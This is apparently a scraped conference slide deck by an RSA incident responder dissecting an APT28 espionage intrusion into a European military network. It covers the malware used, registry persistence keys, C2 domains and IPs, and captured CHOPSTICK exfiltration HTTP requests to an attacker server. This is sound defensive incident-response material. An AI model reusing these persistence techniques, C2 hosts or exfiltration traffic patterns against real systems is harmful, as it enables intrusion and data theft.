dissection of a Cyber- Espionage attack
cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack
cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
SESSION ID: CTT-W08<br />
Evolving Threats:<br />
<strong>dissection</strong> <strong>of</strong> a <strong>Cyber</strong>-<br />
<strong>Espionage</strong> <strong>attack</strong><br />
Stefano Maccaglia<br />
Advisory Consultant IR<br />
RSA (a Division <strong>of</strong> EMC)<br />
#RSAC
Who I Am<br />
#RSAC<br />
I prefer not to talk too much about myself…<br />
Let just say I am Advisory Consultant at RSA IR<br />
I am an Incident Responder with deep knowledge <strong>of</strong> malware and network<br />
analysts<br />
I have started my career in 1997<br />
I have worked for several top 100 companies<br />
Before that I have been a cracker in Europe «underground scene» <strong>of</strong> Amiga and<br />
PCs.
Agenda<br />
What we discuss today<br />
Today I would introduce a case I am still working on.<br />
The case is related to Military Sector, and it has been recorded with minimal<br />
differences in several EU military environments.<br />
The details <strong>of</strong> the <strong>attack</strong> are under strict NDA, but with slight modifications I have<br />
the chance to share the most important details about the <strong>attack</strong>er strategies, tactics<br />
and tools used.<br />
The case is interesting for several reasons that we will discuss today.<br />
The triage is still going on.<br />
#RSAC
The adversary<br />
APT28<br />
#RSAC<br />
The <strong>attack</strong> has been attributed to APT Group 28, also known as “S<strong>of</strong>acy” or<br />
“Sednit”. I will call it “APT28” from now on.<br />
APT28 group believed to have been in operation since 2007 and has been<br />
identified in several <strong>attack</strong>s that have targeted Eastern European governments,<br />
military and security-related organizations including the North Atlantic Treaty<br />
Organization (NATO).<br />
The group uses a complex set <strong>of</strong> tools and strategies to put a foothold in an<br />
environment and to control and steal interesting data.<br />
Several sources consider APT28 a group <strong>of</strong> <strong>Cyber</strong>Mercs based in Russia.
The target: the moat without water<br />
How to develop a good network segmentation and be breached<br />
#RSAC<br />
The <strong>attack</strong> has targeted a military environment in EMEA region.<br />
The environment has born segmented, with several layer <strong>of</strong> controls to preserve<br />
confidentiality and integrity <strong>of</strong> exchanged and stored data.<br />
The segmentation separates the network in several layers with different level <strong>of</strong><br />
“trust”.<br />
Any operator receives a badge and a smartcard to operate in the network.<br />
Communication from a lower to an higher layer <strong>of</strong> trust is blocked, instead<br />
communication from higher layer to a lower one are permitted.<br />
At the beginning <strong>of</strong> the investigation I discovered that the base lacks any real<br />
network visibility. The only network devices capable <strong>of</strong> analyzing streams were<br />
sporadic IDS and IPS placed in non strategic points.
The target: the moat without water<br />
How to develop a good network segmentation and be breached<br />
The environment is a Micros<strong>of</strong>t AD Forest with a pyramidal structure.<br />
#RSAC<br />
• The root AD trusts several subdomains each with<br />
its proper set <strong>of</strong> AD servers.<br />
• The forest is regulated with different level <strong>of</strong> trust.<br />
• The «Secret» and «NATO» networks are physically<br />
separated entities were people can access only<br />
through dedicated machines.<br />
• Under no circumstances a user from standard AD<br />
structure can access Secret networks.
The target: the moat without water<br />
How to develop a good network segmentation and be breached<br />
Patching policies are 15 days behind Micros<strong>of</strong>t releases.<br />
#RSAC<br />
All other applications are patched and upgraded based on internal CERT approval.<br />
The reason for the delay is due to the need to verify the consistency and the impact<br />
<strong>of</strong> upgrade/patch against production environment.<br />
During the investigation we have discovered that, in the Data Center, two AD<br />
servers related to trusted subdomains, were not properly patched since November<br />
2014 due to the swap from a maintenance contractor to another.<br />
The lack <strong>of</strong> the patch MS14-068 is a key to understand how deep and how hard<br />
they have been breached.
The Attack<br />
#RSAC
The <strong>attack</strong> strategy<br />
How they break-in<br />
The <strong>attack</strong> started from a targeted spear-phish campaign against the participants <strong>of</strong><br />
the 2014 Farnborough Air Show.<br />
The <strong>attack</strong> has targeted 7 <strong>of</strong>ficials <strong>of</strong> Air Force (AM) and 2 <strong>of</strong>ficial <strong>of</strong> the Navy (MM)<br />
the email domain source was: “militaryexponews[.]com”<br />
The <strong>attack</strong> exploit a Micros<strong>of</strong>t Word vulnerability (CVE-2015-2424).<br />
Only in two cases the <strong>attack</strong> completes successfully for the <strong>attack</strong>er.<br />
In seven cases, the exploit, despite successfully detonated, was not able to start the<br />
infection because the machines lack direct Internet access (proxy blocked<br />
connection attempts).<br />
The reconstruction <strong>of</strong> the first stage has been performed after the creation <strong>of</strong> a<br />
proper set <strong>of</strong> IOCs starting from the infected systems.<br />
#RSAC
The Attack<br />
#RSAC<br />
Dissemination strategy<br />
Spear<br />
phishing<br />
Vector +<br />
First<br />
Dropper<br />
Coreshell<br />
Dropper<br />
First C&C<br />
HTTP POST<br />
message<br />
Streams to<br />
external C2 or<br />
Dropzone<br />
Second<br />
Stage<br />
backdoor<br />
download<br />
(EVILTOSS)<br />
EVILTOSS<br />
Execution<br />
Malware<br />
beacons to<br />
C&C and<br />
sends stolen<br />
data<br />
Lateral<br />
movements<br />
and Exfil<br />
EVILTOSS<br />
can<br />
download<br />
CHOPSTICK<br />
TROJAN<br />
from C&C<br />
CHOPSTICK<br />
allows the<br />
<strong>attack</strong>er to<br />
extend the<br />
control <strong>of</strong><br />
the target<br />
Complete<br />
control over<br />
target<br />
system
Attack Overview: End <strong>of</strong> First Wave<br />
#RSAC<br />
The infected hosts, during roaming in external sites, communicates with C2<br />
When roaming they connect to C2.<br />
Attacker<br />
Main C2<br />
Victim 1<br />
Victim 2<br />
micros<strong>of</strong>thelpcenter.info<br />
Attempts to access C2<br />
Blocked by proxy<br />
Attempts to access C2<br />
Base<br />
Note: The repeated attempts to communicate externally from infected machines blocked<br />
by proxy have been considered «<strong>of</strong> no interest» for the SOC <strong>of</strong> the base. No other<br />
investigation or action has been taken, at time, against these machines.
The <strong>attack</strong> strategy<br />
More patients to care about…<br />
To escalate the infection the <strong>attack</strong>er have used the OWA access <strong>of</strong> the stolen<br />
accounts to enumerate other potential victims for a new wave <strong>of</strong> targeted emails.<br />
#RSAC<br />
Also, one <strong>of</strong> the <strong>of</strong>ficers has access to internal Sharepoint service and participates<br />
to boards were specific internal meetings and projects are discussed.<br />
With tailored messages published in Sharepoint board, the <strong>attack</strong>er has been able<br />
to sneak through the inner layers <strong>of</strong> the military infrastructure distributing the<br />
dropper.<br />
One lesson I learn from Sharepoint…<br />
it has a horrible Log format.
Attack Overview: End <strong>of</strong> Second Wave<br />
#RSAC<br />
Still under control<br />
Still under control<br />
Attacker<br />
C2s<br />
Victim 1<br />
Victim 2<br />
Base<br />
Base hosts<br />
micros<strong>of</strong>thelpcenter.info<br />
1oo7.net<br />
176.31.112.10<br />
Washington<br />
Moskow<br />
Public WAN<br />
Kiev<br />
Skopje<br />
Addis Ababa
The <strong>attack</strong> strategy<br />
The infection evolution<br />
In this second wave <strong>of</strong> <strong>attack</strong> the adversary, knowing that the previous phase has<br />
not succeeded as planned due to access restriction with proxy and firewalls, has<br />
modified the dropper in order to work with internal proxy (with HTTP and SSL).<br />
The modification has insured the control <strong>of</strong> all successfully infected hosts.<br />
#RSAC<br />
IOC<br />
Proxy<br />
Test performed<br />
after collection <strong>of</strong><br />
the dropper from<br />
original spear<br />
phising email
The <strong>attack</strong> strategy<br />
The infection progression<br />
#RSAC<br />
The <strong>attack</strong>er has now a significant set <strong>of</strong> standard Domain Users account.<br />
Not enough to pawn the infrastructure, but good enough as a starting point.<br />
Thanks to his backdoor, he can easily begin to extend his action to other systems.<br />
Lacking logs and network visibility, for that part, we can only speculate that he<br />
successfully identifies the vulnerable Navy subdomains by accessing Navy computers<br />
in the base.<br />
The victims have direct access to the abovementioned AD servers because they use<br />
them for standard authentication.<br />
APT28 at this point has breached AD servers, has collected domain admins<br />
credentials and has moved forward to the Root AD and the repositories where<br />
“interesting data” resides.
CVE 2014-6324<br />
#RSAC<br />
LOG IOC<br />
Windows Audit log showing the successful exploitation <strong>of</strong> the Kerberos Service.<br />
• When looking at the Audit log, to<br />
understand the successful exploit we<br />
should compare the Security ID with<br />
the Account Name.<br />
These two should be identical.<br />
• In this case, slightly modified from the<br />
original log, we can see the «Officer<br />
A» logging with the Security ID <strong>of</strong><br />
«Administrator».
Pwning the core: CVE-2015-1701<br />
AKA… «How to pwn your AD and live undetected»…<br />
#RSAC<br />
The <strong>attack</strong>er has been able to exploit root AD Servers thanks to a unknown (initially)<br />
local privilege escalation vulnerability CVE-2015-1701.<br />
The <strong>attack</strong>er has<br />
exploited a callback in<br />
UserSpace.<br />
Upon completion, the<br />
payload continues<br />
execution in UserMode<br />
with the privileges <strong>of</strong><br />
the System process.<br />
Note: The technique has been reported by Micros<strong>of</strong>t thanks to the<br />
analyses carried out in this engagement…
The Incident<br />
#RSAC
Patient Zero<br />
How the victim discovers the problem<br />
The diplomatic representation in Addis Ababa is composed <strong>of</strong> few militaries and<br />
several diplomats connected to Internet with the standard VPN service from public<br />
networks (transit through the Base). For that part, nobody has noticed the strange<br />
connections to the external C2s repeated each day.<br />
But for a specific task, the owner <strong>of</strong> the infected laptop has used a connection from<br />
a military outpost, tightly regulated in access time and permissions.<br />
Once connected, the computer has attempted to beacon to the C2s and the local<br />
network operator has identified the strange traffic signaling it to his superiors.<br />
The alert has escalated to the Army regiment which has started to investigate.<br />
The analysis performed has followed the traditional practice.<br />
#RSAC
Patient Zero<br />
What’s on Customer “Patient Zero” machine?<br />
The forensic analysis on the «Patient Zero» identified by the Customer showed<br />
the following suspicious files and registry modifications, but no attempts to<br />
expand the focus <strong>of</strong> the investigation have been made.<br />
#RSAC<br />
Registry Keys and Values Created Modified<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = C:\Windows\System32\netids.dll Yes No<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1 Yes No<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Micros<strong>of</strong>t\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service Yes No<br />
HKEY_LOCAL_MACHINE\s<strong>of</strong>tware\micros<strong>of</strong>t\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam ➝ 1 Yes No<br />
EVILTOSS backdoor
Patient Zero consequences<br />
How the <strong>attack</strong>er reacted<br />
#RSAC<br />
The Army has triaged the compromised system reinstalling the OS and applications<br />
and has close the case.<br />
As result <strong>of</strong> the triage, the <strong>attack</strong>er changes strategy for a while.<br />
APT28 has lowered the volume <strong>of</strong> his traffic and, for more than 20 days nothing<br />
has been reported.<br />
The military was ready closed the case, but another anomaly has been founded<br />
during a scheduled maintenance on a server in the base Data Center.<br />
Looking at the logs, they have discovered the presence <strong>of</strong> repeated accesses from<br />
ad Administrator account logging from an external IP address.<br />
The case has escalated quickly this time.
The Methodology<br />
#RSAC
What we can bring to the table?<br />
#RSAC<br />
<br />
<br />
<br />
<br />
<br />
I am part <strong>of</strong> RSA IR Team and our structured approach, developed from our<br />
field experience is now tuned to face <strong>attack</strong>s like this one.<br />
Our approach leverages on “Actionable IoCs” and the support <strong>of</strong> tools that<br />
could easily integrate these IoCs to speedup the IR investigation process.<br />
This is a methodology and not a “method”, because it counts on procedures,<br />
analyses and evidences in a scientifically sounding approach.<br />
To collect actionable IoCs we use a synergic approach that includes network<br />
and system visibility with log and malware analyses.<br />
It involves aggregation <strong>of</strong> IoCs and their classification to create a “Knowledge<br />
Base” <strong>of</strong> <strong>attack</strong>s, tools and strategies that could be “reused” in subsequent<br />
engagements to streamline the response and support the attribution.
The Methodology<br />
#RSAC<br />
Network<br />
visibility<br />
Malware<br />
visibility<br />
Incident<br />
surface.<br />
System<br />
visibility<br />
Network, system<br />
and log indicators.<br />
Classification and<br />
attribution.<br />
Triage planned from<br />
a tailored set <strong>of</strong><br />
strategic actions.
Actionable IoCs<br />
What our methodology suggests<br />
IR is an ongoing process that spawns on multiple areas.<br />
#RSAC
Actionable IoCs<br />
What our methodology suggests<br />
#RSAC<br />
To operationalize the IoC you should develop, use and store it in a reusable logic.
Investigation: first step<br />
The Customer has initially escalated the problem to another team, but despite<br />
the efforts and a triage attempt, the result was not satisfactory.<br />
Few days after the triage they discover additional lateral movements in their<br />
network.<br />
At this point the Customer called us.<br />
We notice, since the initial talk, that the Customer was lacking any network<br />
visibility and the investigation was performed without a structured approach.<br />
No network visibility<br />
#RSAC<br />
No detailed analysis has<br />
been performed initially<br />
Limited quantity <strong>of</strong><br />
historical logs<br />
The initial investigation has<br />
been limited to MD5 search<br />
on Domain machines.
Zero Trust<br />
Below zero trust…<br />
Following our advice to bring a network forensic tool in their environment (RSA<br />
Security Analytics) we have been able to ensure that, even after the «apparent»<br />
expulsion <strong>of</strong> the <strong>attack</strong>er, several machines were still infected.<br />
#RSAC<br />
Successful<br />
communication<br />
recorded after<br />
expulsion/triage…<br />
The «network<br />
visibility» has<br />
<strong>of</strong>fered also<br />
the chance to<br />
proactively<br />
monitor the<br />
occurrence <strong>of</strong><br />
other malicious<br />
<strong>attack</strong>s.
Our investigation<br />
Our approach tailored to the case<br />
• We have rebuilt the investigation process from the scratch aiming to identify malicious<br />
behavior from the already collected samples to build optimal Network Forensic IOC and to<br />
apply them as a base to highlight further machines infected.<br />
#RSAC<br />
Integrated a Network<br />
Forensic Tool: RSA SA<br />
Redefined Actionable<br />
IOCs at Network, System<br />
and Log level for different<br />
platforms and systems.<br />
Refocused the malware<br />
analysis on all identified<br />
samples to identify<br />
Actionable IOCs.<br />
Improved the triage<br />
strategy by moving from<br />
°seek & destroy° to a<br />
more strategic approach.<br />
• Thanks to that we have been able to enumerate remaining infected machines and to unearth<br />
the “missing piece”: the Chopstick RAT that the original IR team was not capable <strong>of</strong> identify.<br />
We know, from experience, that APT28 uses Chopstick RAT for most interesting targets.
Attacker Tools<br />
#RSAC
APT 28 Tools<br />
APT 28 Tools seen in this investigation<br />
#RSAC<br />
CORESHELL: This downloader is the evolution <strong>of</strong> the previous downloader <strong>of</strong><br />
choice from APT28 known as “SOURFACE” (or “S<strong>of</strong>acy”). This downloader, once<br />
executed, create the conditions to download and execute a second-stage<br />
(usually Eviltoss) from a C2.<br />
EVILTOSS: This backdoor is delivered through CORESHELL downloader to gain<br />
system access for reconnaissance, monitoring, credential theft, and shellcode<br />
execution.<br />
CHOPSTICK: This is a modular implant compiled from a s<strong>of</strong>tware framework that<br />
provides tailored functionality and flexibility. By far Chopstick is the most<br />
advanced tool used by APT 28.<br />
MIMIKATZ: Everyone <strong>of</strong> us knows this tool. In this case, this has been <strong>of</strong><br />
devastating effects to completely compromise AD Forest.
APT 28 Tools<br />
#RSAC<br />
CORESHELL behavioral analysis<br />
Coreshell was relatively easy to detonate, apart for some AntiVM checks before executing.<br />
The behavioral analysis has permitted to highlight several DNS connections:<br />
The DNS requests aim to different external hosts.<br />
The malware use a beacon mechanism based on<br />
HTTP POST and a separate thread for<br />
instructions still in HTTP.<br />
The User-Agent, as explained earlier, can be used<br />
as IOC, at least for the oldest variants.<br />
Note: Latest version <strong>of</strong> CORESHELL uses the victim’s browser User-Agent<br />
making the IOC useless.
APT 28 Tools<br />
CORESHELL ATTRIBUTION BY COMPARISON<br />
#RSAC<br />
The attribution has been<br />
performed in two ways:<br />
• by comparison, between the<br />
discovered samples and the<br />
public ones.<br />
• by analysis, looking for<br />
indicators related to the date<br />
and time <strong>of</strong> compilation, the<br />
time zone, the language <strong>of</strong><br />
the malware and its<br />
behaviour.<br />
The dropped files have been verified<br />
as well and compared between<br />
different droppers.
APT 28 Tools<br />
EVILTOSS IOCs<br />
At system level the malware modifies the Registry in order to ensure persistence.<br />
It is dropped and executed, usually, from one <strong>of</strong> these folders:<br />
#RSAC<br />
EVILTOSS installation folder<br />
%system%<br />
%temp%<br />
%commonprogramfiles%\System\<br />
Registry Keys and Values Created Modified<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDll = %EVILTOSS<br />
folder%.dll<br />
Yes<br />
No<br />
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Network Identification Service\parameters\ServiceDllUnloadOnStop = 1 Yes No<br />
HKEY_LOCAL_MACHINE\SOFTWARE\Micros<strong>of</strong>t\Windows NT\CurrentVersion\Svchost\ntsvcs = Network Identification Service Yes No<br />
HKEY_LOCAL_MACHINE\s<strong>of</strong>tware\micros<strong>of</strong>t\windowsNT\currentversion\svchost\ntsvcs\CoInitializeSecurityParam ➝ 1 Yes No<br />
download files from a remote computer and/or the Internet<br />
run executable files<br />
log keystrokes<br />
send gathered information
APT 28 Tools<br />
EVILTOSS ATTRIBUTION BY COMPARISON<br />
#RSAC<br />
The attribution has been<br />
performed in two ways:<br />
• by comparison, between the<br />
discovered samples and the<br />
public ones.<br />
• by analysis, looking for<br />
indicators related to the date<br />
and time <strong>of</strong> compilation, the<br />
time zone and the language<br />
<strong>of</strong> the malware discovered.<br />
Also lateral movements have been<br />
verified in terms <strong>of</strong> timeframe <strong>of</strong> the<br />
log and hosts involved.
APT 28 Tools<br />
EVILTOSS IOCs<br />
EVILTOSS and CORESHELL share a lot <strong>of</strong> commonalities, both in the<br />
communication mechanism and the obfuscation/encryption. I.E. both obfuscate<br />
strings that are decoded at runtime.<br />
EVILTOSS uses RSA encryption to encrypt data and send it through a HTTP<br />
POST message very similar to CORESHELL traffic:<br />
#RSAC<br />
Cont…<br />
C2 ack for exfil
APT 28 Tools<br />
CHOPSTICK<br />
CHOPSTICK is a Trojan family, written in C++ and built from a framework.<br />
It <strong>of</strong>fers a diverse set <strong>of</strong> capabilities for different deployments.<br />
It collects detailed information from the host settings and it is aware <strong>of</strong> the presence<br />
<strong>of</strong> several security products.<br />
It may communicate with external servers using SMTP, HTTP or HTTPs.<br />
CHOPSTICK stores all collected information in a hidden file for temporary storage.<br />
It communicates with the C2 via Windows “mailslot”, not named pipes or sockets.<br />
CHOPSTICK main executable creates a “mailslot” in Windows machines and acts as<br />
the mailslot server, while its code injected into the other processes acts as a client<br />
allowing the Trojan to access and steal any type <strong>of</strong> information.<br />
The RC4 encryption used here also uses a 50 bytes static key plus four-byte random<br />
salt value.<br />
#RSAC
APT 28 Tools<br />
CHOPSTICK IOCs<br />
Looking at network traffic we discover that, after approximately 60 seconds <strong>of</strong><br />
execution time, CHOPSTICK begins communicating with one <strong>of</strong> its C2 servers.<br />
Usually as in our sample the traffic was over HTTP:<br />
GET /find/?itwm=90QDFR9CWZckwkTPHr2GOUXPXI91A&from=yVVgOqV1UG&utm=HTXh&utm=9kV7L3Z&oprnd=Xjp1kKrDgAeFu&from=06&9u2J=nYruvlhMtXN5<br />
HTTP/1.1<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)<br />
Host: 198.105.125.74<br />
After sending an initial HTTP GET request it uploads the file contents <strong>of</strong><br />
edg6EF885E2.tmp to the C2 server using HTTP POST requests.<br />
POST /open/?ags=bBz&ags=qVs5d0kGHtil&oprnd=6ZCuc7XQ&channel=gBDFmj_fJdNk9&itwm=HJxam7mDOyIBftJ6OwEQjGBzyjpQv HTTP/1.1<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)<br />
Host: 198.105.125.74<br />
Content-Length: 69<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache EMo1MTmWmHwJAwHlezPSG5-SGWRYwQm6MbGxkYhvCv7-FRCezztd2UxRArSxP285WXg==<br />
#RSAC
The <strong>attack</strong> strategy<br />
IOC: C2 list<br />
Thanks to our structured approach we have been able to identify the C2s used by<br />
the <strong>attack</strong>er and with them, we have been able to enumerate infected hosts based<br />
on network communications.<br />
Note: The <strong>attack</strong>er has<br />
URL IP Type<br />
used different<br />
micros<strong>of</strong>thelpcenter.info 87.236.215.13 HTTP/HTTPS Main C2 infrastructures for<br />
driversupdate.info 46.19.138.66 HTTPS C2<br />
managing infected<br />
hosts.<br />
1oo7.net 5.199.171.58 HTTPS C2<br />
Note: Some <strong>of</strong> the<br />
66.172.12.133 66.172.12.133 Coreshell C2 discovered C2s are in<br />
45.64.105.23 45.64.105.23 Coreshell C2<br />
common with other<br />
<strong>attack</strong>s recorded against<br />
176.31.112.10 176.31.112.10 HTTPS C2 other military<br />
environments in EMEA.<br />
176.31.96.178 176.31.96.178 HTTPS C2<br />
The C2 list has confirmed the attribution and has paved the way<br />
for a more structured approach for Triage<br />
#RSAC
Incident Timeline and Stats<br />
#RSAC<br />
Results <strong>of</strong> our methodology Vs previous results obtained by the Customer<br />
Peak <strong>of</strong> <strong>attack</strong> distribution<br />
300<br />
250<br />
Final triage managed by<br />
our Team<br />
200<br />
150<br />
100<br />
50<br />
Initial<br />
Spearphishing<br />
First Phase <strong>of</strong><br />
Attack<br />
Patient Zero<br />
Last record <strong>of</strong> infected<br />
machine<br />
0<br />
Oct‐14 Nov‐14 Dec‐14 Jan‐15<br />
Feb‐15 Mar‐15<br />
Apr‐15<br />
Initial massive<br />
triage<br />
May‐15<br />
Jun‐15<br />
Jul‐15<br />
Aug‐15<br />
First time our<br />
methodology has applied<br />
Sep‐15<br />
Remediation<br />
APT28<br />
APT28<br />
Remediation
Conclusion<br />
What I can suggest<br />
It is extremely valuable to build an internal Knowledge base about incidents and<br />
<strong>attack</strong>s recorded and published and to extract IOCs from these incidents.<br />
It is extremely useful to refocus the IR procedures dividing them in four areas:<br />
<br />
<br />
<br />
<br />
Network Forensic<br />
System Forensic<br />
Log Analysis<br />
Malware Analysis<br />
Actionable IOCs<br />
Rapid Incident reaction<br />
Proactive Management<br />
It could be extremely important to streamline the IR procedures by transforming IOCs<br />
to actionable IOCs, that means to evaluate and define which IOC can be reused and<br />
which one is limited to a specific <strong>attack</strong> or event.<br />
It is important to drill and to give IR personnel the chance to learn how to build, use,<br />
extract, evaluate and properly store Actionable IOCs.<br />
#RSAC
Conclusion<br />
What our methodology suggests<br />
#RSAC<br />
You should not approach IR<br />
operations in a unstructured<br />
way.<br />
You should ensure proper<br />
«visibility» to all IR fields.<br />
You should avoid to manage<br />
the Incident through «work<br />
arounds» and «shortcuts»<br />
You should avoid to rely only<br />
on technologies<br />
You should keep your IR<br />
capabilities updated<br />
Once formalized, you should<br />
use IoCs as key element to<br />
evaluate the <strong>attack</strong> surface<br />
You should organize the<br />
triage in a strategic approach.
#RSAC
EMC, RSA, the EMC logo and the RSA logo are trademarks <strong>of</strong> EMC Corporation in the U.S. and other countries.